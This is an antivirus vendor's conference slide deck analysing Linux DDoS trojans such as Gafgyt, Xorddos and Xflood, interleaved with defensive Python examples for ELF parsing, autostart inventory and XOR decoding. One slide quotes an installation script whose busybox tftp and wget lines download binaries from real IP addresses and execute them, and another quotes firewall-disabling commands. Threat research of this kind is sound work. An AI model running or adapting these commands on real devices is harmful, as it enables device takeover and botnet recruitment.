
avar2015_ddos_trojans_slides


  1. www.avast.com
     Peter Kálnai, Jaromír Hořejší
     DDoS Trojans: When embedded devices flood
     AVAR 2015, Da Nang, Vietnam
  2. Outline
     • History and evolution of the threat
     • Common characteristics of malware
     • Autostart (persistence)
     • Infection chain
       – Methods of intrusion
     • Cybercriminals’ operation tools
       – Bot builders and C&C panels
       – HFS listings
       – Brute-forcers
       – Vulnerability & port scanners
     • DDoS Trojans (Tsunami-like; Gafgyt; Powbot; MrBlack; Xorddos; Xflood; ChinaZ)
     • Summary
  3. History
     • (Čeleda et al., MU, Brno) “Embedded malware - an analysis of the Chuck Norris botnet”, December 2009 (ELF:PsyBot)
     • Internet Census of 2012: “Port scanning /0 using insecure embedded devices” (Carna botnet)
     • (Dr. Web) “DDoS Trojans attack Linux”, May 2014 (ELF:MrBlack)
     • (Kaspersky) “Shellshock and its early adopters”, September 2014 (ELF:Gafgyt)
     • (Symantec) “Linux.Powbot”, September 2014 (ELF:Powbot)
     • VirusTotal added a “File detail” tab with parsed ELF characteristics, December 2014
  4. History
     • (WooYun.org) “海康威视等监控和物联网设备被用于僵尸网络的实例” (~“Examples of Hikvision surveillance and networking devices used as botnets”), December 2014 (ELF:Xflood)
     • (Krebs on Security) “Lizard Stresser Runs on Hacked Home Routers”, January 2015 (ELF:Gafgyt)
     • (Yin Minn Pa Pa et al.) “IoTPOT: Analysing the Rise of IoT Compromises”, August 2015 (ELF:Gafgyt; ELF:Powbot; ELF:Xflood)
     • (Avast) “DDoS trojans: A malicious concept that conquered the ELF format”, Virus Bulletin, September 2015
     • (Incapsula) “CCTV Botnet In Our Own Back Yard”, October 2015
  5. ELF IoT malware space
     • Visualization using Gephi (Force Atlas 2)
       – Nodes: malware families determined by signatures; size dependent
       – Edges: connect nodes if they share a signature
     • Clustered ~3500 samples with e_machine parameter EM_ARM, EM_MIPS, EM_SH, EM_SPARC, EM_PPC (November 2015; ~20000 ELF malware samples in total, excluding Android PUAs)
     • Coloured in 4 categories (General-purpose trojans; DDoS trojans; Viruses; Unclassified)
     • Excluded samples of little or no interest:
       – Truncated files
       – Components of Android packages
       – EM_386 and EM_x86_64
  6. Common ELF characteristics
     • The ELF header
       – e_type: executable file or shared object
       – e_machine with prefix “EM_” followed by 386, x86_64, ARM, MIPS, SH, PPC, SPARC or M68K
     • Segments
       – Described by program headers
       – Segments contain one or more sections
     • Sections
       – Names (.bss, .init, .got, .plt, .rel, .rodata, .strtab, .symtab, .text)
       – Special types (SYMTAB, STRTAB) also contain imported and exported symbols; affected by the process of stripping → harder reverse engineering
       – .rodata usually contains character strings
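As an added example (not code from the slides or from Avast), a small parser for the header fields just listed: it reads EI_CLASS and EI_DATA, then e_type and e_machine, and walks the section header table to tell whether the .symtab section has been stripped, the property the slide calls out as making reverse engineering harder. The two ELF images it runs on are constructed inside the code, not real samples.

```python
import struct

# e_type / e_machine constants from the ELF specification, restricted to the
# architectures named on the slides
EM_NAMES = {3: "EM_386", 62: "EM_x86_64", 40: "EM_ARM", 8: "EM_MIPS",
            42: "EM_SH", 20: "EM_PPC", 2: "EM_SPARC", 4: "EM_M68K"}
ET_NAMES = {2: "ET_EXEC (executable)", 3: "ET_DYN (shared object)"}
SHT_SYMTAB = 2

def describe_elf(data):
    """Return class, e_type, e_machine and whether no .symtab section is present."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    bits = {1: 32, 2: 64}[data[4]]               # EI_CLASS
    end = {1: "<", 2: ">"}[data[5]]              # EI_DATA: little or big endian
    if bits == 32:                               # Elf32_Ehdr (52 bytes) / Elf32_Shdr (40 bytes)
        ehdr = struct.unpack_from(end + "HHIIIIIHHHHHH", data, 16)
        shdr_fmt = end + "10I"
    else:                                        # Elf64_Ehdr (64 bytes) / Elf64_Shdr (64 bytes)
        ehdr = struct.unpack_from(end + "HHIQQQIHHHHHH", data, 16)
        shdr_fmt = end + "IIQQQQIIQQ"
    e_type, e_machine, e_shoff = ehdr[0], ehdr[1], ehdr[5]
    e_shentsize, e_shnum = ehdr[10], ehdr[11]
    # walk the section header table; sh_type is the second field of both Shdr
    # layouts, and a stripped binary has no SHT_SYMTAB entry (or no table at all)
    has_symtab = any(struct.unpack_from(shdr_fmt, data, e_shoff + i * e_shentsize)[1]
                     == SHT_SYMTAB for i in range(e_shnum))
    return {"class": bits, "type": ET_NAMES.get(e_type, "unknown(%d)" % e_type),
            "machine": EM_NAMES.get(e_machine, "EM_%d" % e_machine),
            "stripped": not has_symtab}

def build_sample(bits, end, e_machine, with_symtab):
    """Constructed test image: a bare ELF header plus an optional section table
    (not a real binary, just enough structure for describe_elf to walk)."""
    ident = b"\x7fELF" + bytes([1 if bits == 32 else 2, 1 if end == "<" else 2, 1]) + bytes(9)
    if bits == 32:
        ehdr_fmt, shdr_fmt, ehsize, shentsize = "HHIIIIIHHHHHH", "10I", 52, 40
    else:
        ehdr_fmt, shdr_fmt, ehsize, shentsize = "HHIQQQIHHHHHH", "IIQQQQIIQQ", 64, 64
    shnum = 2 if with_symtab else 0
    img = ident + struct.pack(end + ehdr_fmt, 2, e_machine, 1, 0, 0, ehsize if shnum else 0,
                              0, ehsize, 0, 0, shentsize, shnum, 0)
    if with_symtab:  # SHT_NULL entry followed by one SHT_SYMTAB entry
        img += struct.pack(end + shdr_fmt, *([0] * 10))
        img += struct.pack(end + shdr_fmt, 0, SHT_SYMTAB, *([0] * 8))
    return img

MIPS_BOT = build_sample(32, ">", 8, True)       # big-endian MIPS router bot, symbols kept
X86_64_BOT = build_sample(64, "<", 62, False)   # x86_64 server bot, section table removed
```

On a real file, `describe_elf(open(path, "rb").read())` gives the same four fields the VirusTotal “File detail” tab exposes.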
  7. Common ELF characteristics
     • Static properties:
       – Trojanized flooding tools
       – Significant portion of code shared among all the variants
       – Written mostly in C/C++
       – Debug info often not stripped
       – Variety of supported flooding methods
         • UDP, TCP/SYN, ICMP, DNS, DNS amplification
       – Killing competing resource-consuming processes
       – In plain form or packed with UPX
         • UPX sometimes modified to avoid unpacking by the original UPX tool (modified magic value, checksums do not match)
  8. Autostart / Persistence
     • In a strict sense a DDoS trojan is a DDoS tool with an autostart
     • Methods of autostart / persistence found in the wild:
       – (A1) /etc/init.d/
         • Startup scripts copied here
       – (A2) /etc/cron.<S>
         • <S> from { hourly, daily, weekly, monthly }
         • A service can be added to /etc/crontab
       – (A3) /etc/rc<N>.d/
         • Symbolic links to startup scripts
         • <N> is a runlevel indicator (Halt 0; Single-user 1; Multi-user 2-5; Reboot 6)
         • Alternatively, a path can be added to /etc/rc.local
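An added example, not from the slides: a read-only inventory of the A1–A3 autostart locations that an analyst can run against a mounted image or a live root. It runs here against a constructed directory tree (the /boot file name is a made-up placeholder) so that it works offline.

```python
import os, re, tempfile

RUNLEVEL_DIR = re.compile(r"^rc[0-6S]\.d$")
CRON_DIRS = ("cron.hourly", "cron.daily", "cron.weekly", "cron.monthly")

def _lines(path, skip=("#",)):
    # non-empty lines that do not start with a skipped prefix (comments, "exit 0")
    with open(path) as f:
        return [l.strip() for l in f if l.strip() and not l.strip().startswith(skip)]

def _entries(d): return sorted(os.listdir(d)) if os.path.isdir(d) else []

def find_autostarts(root="/"):
    """Inventory of the A1-A3 autostart locations below <root>/etc as (method, path, detail)."""
    etc = os.path.join(root, "etc")
    found = []
    for name in _entries(os.path.join(etc, "init.d")):                 # A1 startup scripts
        found.append(("A1 init.d", os.path.join(etc, "init.d", name), None))
    for d in CRON_DIRS:                                                 # A2 cron.<S> directories
        for name in _entries(os.path.join(etc, d)):
            found.append(("A2 " + d, os.path.join(etc, d, name), None))
    crontab = os.path.join(etc, "crontab")
    if os.path.isfile(crontab):                                         # A2 system crontab
        for line in _lines(crontab):
            if "=" not in line.split()[0]:      # skip SHELL=/PATH= variable lines
                found.append(("A2 crontab", crontab, line))
    for name in _entries(etc):                                          # A3 rc<N>.d symlinks
        if RUNLEVEL_DIR.match(name):
            for link in _entries(os.path.join(etc, name)):
                p = os.path.join(etc, name, link)
                found.append(("A3 " + name, p, os.readlink(p) if os.path.islink(p) else None))
    rclocal = os.path.join(etc, "rc.local")
    if os.path.isfile(rclocal):                                         # A3 alternative: rc.local
        for line in _lines(rclocal, skip=("#", "exit")):
            found.append(("A3 rc.local", rclocal, line))
    return found

def build_demo_tree():
    """Constructed sample tree (not a real host): one entry of each kind, plus a made-up /boot name."""
    root = tempfile.mkdtemp()
    etc = os.path.join(root, "etc")
    for d in ("init.d", "cron.hourly", "rc3.d"):
        os.makedirs(os.path.join(etc, d))
    open(os.path.join(etc, "init.d", "sshd"), "w").close()
    open(os.path.join(etc, "cron.hourly", "example.sh"), "w").close()
    os.symlink("../init.d/sshd", os.path.join(etc, "rc3.d", "S20sshd"))
    with open(os.path.join(etc, "crontab"), "w") as f: f.write("SHELL=/bin/sh\n*/3 * * * * root /etc/cron.hourly/example.sh\n")
    with open(os.path.join(etc, "rc.local"), "w") as f: f.write("#!/bin/sh\n/boot/abcdefghij\nexit 0\n")
    return root
```

Entries pointing at /boot, /tmp or a recently created script are the ones worth diffing against a known-good image of the same device.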
  9. Self-protection features
     • Disabling firewalls
       – SuSEfirewall2 stop;
       – reSuSEfirewall2 stop;
     • Modifying iptables policies
       – iptables -D INPUT -p tcp --dport 23 -j DROP
       – Drops packets on port 23
       – Prevents remote connection to the compromised computer
  10. Infection chain
     • Attackers
       – build ELF malware using a customized builder
       – start an HTTP File Server (HFS), which hosts the previously built malicious binaries
       – run port scanners on IP ranges
  11. Infection chain
     • If a desired port is open
       – Shellshock vulnerabilities (Bossabot)
       – PHP vulnerabilities like CVE-2012-1823 (Zollard, Bossabot)
  12. Infection chain
     • If a desired port is open
       – SSH/Telnet brute-force attack
         • Lists of user names and passwords
         • Runs from Windows or Linux machines, targets Linux devices
         • Telnet default password lists
  13. Infection chain
     • Data files acquired from HFS listings
       – Lists of target IPs
       – Password lists
       – Result of a port scan (wineggdrop) as found in an archive on a compromised machine
       – About 2M IPs scanned and 14K hosts with open port 22 found
  14. Infection chain
     • Data files acquired from HFS listings
       – Lists of vulnerable devices, e.g. routers with default credentials
  15. Cybercriminals’ operation tools
     • Bot builders
  16. Cybercriminals’ operation tools
     • C&C panels (for ELF:MrBlack)
  17. Cybercriminals’ operation tools
     • HTTP File Server (HFS) listings
       – Count of downloads related to the number of infected machines and the size of the botnet
  18. Cybercriminals’ operation tools
     • Vulnerability scanners & exploits
       – Shellshock scanner
  19. Cybercriminals’ operation tools
     • SSH brute-forcers
       – linux%d.exe
         • scans all IPs for open port 22,
         • tries passwords from passwd%02d.txt,
         • outputs lx_pass.txt
       – Leaked online
  20. Cybercriminals’ operation tools
     • SSH uploader
       – ssh.exe (Python script, compiled with py2exe)
         • reads lx_pass.txt,
         • connects to each host and
         • executes there the commands from the command.txt file
  21. Cybercriminals’ operation tools
     • Port scanners
       – ScanPort
       – WinEggDrop
  22. DDoS Trojans: Gafgyt
     • Detection name for the Lizard Stresser DDoS tool
     • Character strings:
       – “/bin/busybox;echo -e 'gayfgt'”, “BOGOMIPS”, “echo -e '\x67\x61\x79\x66\x67\x74'”
     • Source code leaked in January 2015; both client and server side available
     • Intrusion via
       – Brute-forcing telnet
       – Shellshock vulnerabilities
     • IRC bot with implemented client commands:
       – PING, GETLOCALIP, SCANNER, TCP, UDP, DNS, KILLATTK, LOLNOGTFO
     • Threat No. 1 for embedded devices:
       – EM_386, EM_x86_64, EM_SPARC, EM_PPC, EM_SH, EM_ARM, EM_MIPS and EM_68K
  23. DDoS Trojans: Gafgyt
     • Tutorials and installation / compilation scripts available on hacking forums
  24. DDoS Trojans: Gafgyt
     • Recommended VPS hostings
     • Scripts to download cross compilers
     • Scripts compile for several architectures
     • Scripts to download and install on the victim device
     • Configuration of UnrealIRCd
     • Scripts and tools for SSH brute-forcing
  25. DDoS Trojans: Gafgyt
     • Auto cross compiler
  26. DDoS Trojans: Tsunami
     • Source code available under the name kaiten.c
     • IRC bot
     • Well documented, control commands explained
  27. DDoS Trojans: Tsunami
     • Popular, often found botnets with thousands of bots
     • UnrealIRCd with almost 5K clients
  28. DDoS Trojans: Aidra
     • IRC bot, sources available
     • Tutorials on hack forums
  29. DDoS Trojans: Aidra
  30. DDoS Trojans: Powbot
     • Spread via Shellshock & Telnet brute-forcing
     • Variants: EM_ARM, EM_MIPS, (EM_386)
     • Character strings (usually encrypted with the XOR key 0x0E):
       – “wopbot has started”, “%s?XXXXXXXX”, “!+[]+!![]+!![]+!![]+!![]+!![]”, “YESHELLO”, “killattk”
     • Supported commands:
       – kill, udp, syn, dildos (tcp flood), http, mineloris
     • Ability to bypass the Cloudflare anti-DDoS JS challenge
       – JavaScript code generates an answer
       – The answer is sent to the server
       – The server validates the response (if successful, the cf_clearance cookie is set and the client is redirected to the initially requested resource)
  31. DDoS Trojans: Powbot
     • Bypassing Cloudflare
  32. DDoS Trojans: MrBlack
     • Tool with source code available
     • Trojanized extensions dubbed Aesddos and WrkAtk with the autostart feature
     • Contains various character strings:
       – VERS0NEX, Mr.Black, Hacker, MainSocket, DealWithDDoS
     • List of attack-supporting procedures
       – DNS_Flood, SYN_Flood, UDP_Flood, UDPS_Flood, TCP_Flood, CC_Flood, CC2_Flood, CC3_Flood, etc.
     • Executables for Linux operating systems available for architectures:
       – EM_x86_64, EM_386, EM_MIPS, EM_ARM
     • Control panel named “Sword Linux” (shown earlier)
  33. DDoS Trojans: Xorddos
     • Intel variants via SSH brute-forcing; the ARM variant not observed in the wild yet
     • Installation script
       – gets the kernel version,
       – (optional) uploads the kernel header,
       – downloads a customized trojan binary with an embedded LKM
     • LKM based on an open-source rootkit called Suterusu, available on GitHub
     • Heavy autostart features
       – Repeated self-installation under a random name in /boot, then executed; to avoid termination via the kill command
     • C&C communication encrypted in both directions with a hard-coded XOR key (BB2FA36AAA9541F0)
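Added example (not the authors' code) covering the Powbot single-byte key 0x0E from slide 30 and the Xorddos repeating key BB2FA36AAA9541F0 above: a repeating-key XOR decoder, a `strings`-style extractor, and a brute-force recovery of a single-byte key from a known marker string, the routine triage steps for these families. The two blobs are constructed in the code by encrypting plaintexts that reuse strings quoted on the slides; the C&C message layout is invented for illustration.

```python
# Keys as quoted on the slides
POWBOT_KEY = bytes([0x0E])                 # single-byte key used for Powbot strings
XORDDOS_KEY = b"BB2FA36AAA9541F0"          # 16-byte repeating key for Xorddos C&C traffic

def xor_bytes(data, key):
    """XOR data with a repeating key; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def printable_strings(data, min_len=6):
    """Runs of printable ASCII of at least min_len bytes (what `strings` would list)."""
    out, run = [], bytearray()
    for b in data + b"\x00":               # trailing NUL flushes the last run
        if 0x20 <= b < 0x7F:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode())
            run = bytearray()
    return out

def recover_single_byte_key(blob, marker):
    """Return the single-byte XOR key under which `marker` appears in `blob`, else None.
    Tries all 256 values, so it also works on variants that do not use 0x0E."""
    for k in range(256):
        if marker in xor_bytes(blob, bytes([k])):
            return k
    return None

# Constructed sample data (not captured from real samples): a fake .rodata fragment
# and a fake C&C message, made by encrypting plaintexts that use strings from the slides.
# The C&C message layout is invented for illustration only.
RODATA_BLOB = b"\x00" * 4 + xor_bytes(b"wopbot has started\x00YESHELLO\x00killattk\x00", POWBOT_KEY)
CNC_MSG = xor_bytes(b"\x01\x00\x00\x00" + b"3.7.10-1\x00" + b"bot-armv5\x00", XORDDOS_KEY)

def triage():
    """Recover the Powbot key from a known marker, decode both blobs, list the strings."""
    key = recover_single_byte_key(RODATA_BLOB, b"wopbot")
    rodata_strings = printable_strings(xor_bytes(RODATA_BLOB, bytes([key])))
    cnc_strings = printable_strings(xor_bytes(CNC_MSG, XORDDOS_KEY))
    return key, rodata_strings, cnc_strings
```

For Xorddos traffic the same `xor_bytes` call applied to a captured payload with XORDDOS_KEY is enough to make the exchanged strings visible to a signature or IDS rule.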
  34. DDoS Trojans: Xorddos
     • Configuration file (elimination of rivals)
       – Options:
         • md5, denyip, filename, rmfile
       – List of competing processes and files (colour-coded):
         • Red = Elknot / Setag
         • Violet = Sotdas
         • Green = Elknot
         • Blue = MrBlack
  35. DDoS Trojans: Xorddos
     • Control panel
       – Controls two infected devices (EM_386, EM_ARM)
  36. DDoS Trojans: Xflood
     • Reported on a Chinese blog in December 2014
     • Spread via Telnet brute-forcing
     • Examples of character strings:
       – “0916.davinci”, “create daemon process failed.”, “TcpCatFace”, “WebSpiderCC”, “[VERB] SS5 exiting.” (Socks Server 5)
     • Supported flooding methods:
       – SYNFLOOD, ICMPFLOOD, UDPFLOOD, TCPFLOOD,
       – ACKFLOOD, IGMPFLOOD, UDPSMALLFLOOD,
       – TCPMULTICONNECT, SUPERSYN, DNSCIRCUIT, TCPCATFACE,
       – WEBCC_MSG_GETFULL, WEBCC_MSG_INFINITUDE, WEBCC_MSG_SPIDER, WEBCC_MSG_DOWNFILE, WEBCC_MSG_CATFACEWEB
  37. DDoS Trojans: Xflood
     • Installation script
       – Kills processes with the same name
       – Uses busybox commands
         • busybox tftp -r mips -g 93.174.93.52; cp /bin/busybox ./; cat mips > busybox; rm mips; cp busybox telnetx; rm busybox; ./telnetx; rm telnetx
       – The download script selects the payload depending on the device:
         echo $?K_O_S_T_Y_P_E
         cd ..;cd var;busybox tftp -g -r 1.sh 121.199.10.66;chmod 777…
         cd /home;busybox ftpget -u 886 -p 886 61.147.107.94 0923.davinci 0923.davinci;chmod 777…
         cd /mnt;busybox tftp -g -r /s/0923.8196 123.56.86.13;chmod 777…
         busybox wget http://211.155.226.20:8080/socket5_davinci;chmod 777…
         busybox t1ftp -g -r socket5_rdlink 121.199.10.66;chmod 777…
  38. DDoS Trojans: Xflood
     • Targeted chipsets, identified by parsing /proc/cpuinfo
     • RTL8196C (Realtek, MIPS) – wireless APs/routers
     • DaVinci (Texas Instruments; LE ARM) – DaVinci video/vision processors
     • Ralink (MIPS) – routers
     • AR5315 (Atheros; MIPS) – routers
     • Faraday (Faraday Technologies; ARM) – DVRs, IP cameras
  39. DDoS Trojans: ChinaZ
     • Source code of the core features available on GitHub (project DDoSClient)
     • Character strings:
       – “CSocketManager::StartDDosTask”, “Sending Packet...”, “LOGIN_FREE: %s%s@%s@%s@%s@%s”
     • Volumetric attacks
       – SYN, UDP, ICMP, DNS
     • Multiple platforms
       – EM_386, EM_x86_64, EM_MIPS, EM_ARM
     • Samples often compressed with UPX
     • Instruction videos leaked on Chinese forums
       – Web control panel
       – Control panel with Windows GUI
  40. DDoS Trojans: ChinaZ
     • C&C panel
  41. Summary
     • DDoS Trojans: threat No. 1 for servers and embedded systems running Linux
     • Variety of projects available on code-sharing sites or forums
     • Autostart is a desired and advanced feature
     • Similar attack methods implemented
     • Few attempts to hide the functionality by stripping or by (modified) UPX
     • Increased detection rates by AV solutions → malware distributors still careless about detection
     • Targets are both small/medium businesses and services hosted by large CDNs
  42. Acknowledgement
     • Information and data exchange:
       – @benkow_ (& @malwaremustdie)
       – Yin Minn Pa Pa, Shogo Suzuki, Katsunari Yoshioka, Tsutomu Matsumoto, Takahiro Kasama, Christian Rossow (Yokohama National University, Japan; National Institute of Information and Communications Technology, Japan; Saarland University, Germany)
  43. Questions & answers
